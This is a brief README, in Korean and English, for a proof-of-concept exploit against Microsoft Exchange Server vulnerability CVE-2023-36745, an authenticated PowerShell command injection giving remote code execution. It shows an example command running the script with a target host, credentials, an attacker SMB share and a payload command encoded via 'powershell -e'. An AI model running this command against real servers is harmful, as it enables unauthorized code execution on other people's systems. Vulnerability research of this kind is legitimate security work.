
Proof-of-concept 익스플로잇 for Microsoft Exchange Server RCE 취약점 CVE-2023-36745, 인증된 PowerShell 명령 주입을 통한 원격 코드 실행을 가능하게 합니다.
Microsoft Exchange Server CVE-2023-36745 RCE PoC.
예시:
python3 exp.py -H exchange.webdxg.com -u webdxg.com\dddai -p 4IDF7LAU -s \\192.168.237.131\Shares\ -c calc.exe
명령은 powershell -e로 전달됩니다.